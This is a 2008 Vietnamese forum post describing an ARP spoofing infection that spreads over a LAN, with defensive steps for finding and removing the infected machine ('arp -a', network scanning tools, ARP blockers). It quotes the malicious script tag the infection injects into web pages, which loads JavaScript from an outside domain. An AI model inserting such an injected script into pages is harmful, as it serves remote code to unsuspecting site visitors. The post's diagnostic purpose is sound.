|
|
Là một người thường xuyên lướt web,cũng hay bị đính virus ,tình cờ hôm qua khi ghé qua các website chia sẻ dữ liệu của Trung Quốc....thế là lượm luôn bệnh cho PC
Con virus này - tạm gọi là virus, chính xác nó là ARP Spooling - nó có thể bị "lụm" - ý tui là làm thịt - bởi AVG, AntiVir... Nhưng, vấn đề là nó sẽ xuất hiện thông báo liên tục về con virus này ở máy bạn, mặc dù ch.trình diệt virus đã báo là diệt xong. Đơn giản, nó lây qua LAN, khi fát hiện, diệt... máy bị nhiễm đang trong tình trạng broadcast nó sẽ liên tục gửi đến máy bạn. và máy bạn lại nhiễm, cứ như vậy. Việc của bạn là tìm cho ra máy bị nhiễm, thủ tiêu nó!.
Mỗi khi bạn lướt web bằng các trình duyệt: IE, FIrefox, nó sẽ tự động thêm một script lên phần header của trang web- <SCRIPT LANGUAGE=”javascript1.2″ src=”http://u.asdafdgfgf.com/ads.js”></SCRIPT>
Nội dung của file:- http://u.asdafdgfgf.com/ads.js
Nhiệm vụ của bạn: tìm ra máy tính bị nhiễm trong mạng, và gỡ bỏ nó đi
- đầu tiên vào run gõ cmd tiếp theo gõ arp -a
-nó sẽ hiện ra máy ip có cùng địa chỉ mac với gateway
-tiếp theo download phần mềm Look@lan sau về http://www.snapfiles.com/get/lanlook.html
hoặc dùng Microsoft Network Monitor 3.1 để kiểm dò tìm dấu vết virus trong mạng LAN.
-Gỡ bỏ : bạn tải phần mềm chặn ARP,phòng tránh lây lan qua LAN các virus khác nữa .
Tìm hiểu thêm vẻ ARP: http://www.quantrimang.com.vn/he ... trong_mang_LAN.aspx |
|
IP Card
Radar
Đăng vào 17-9-2008 10:35:30
Top
Stick
Numb
Cry
变色卡
显身卡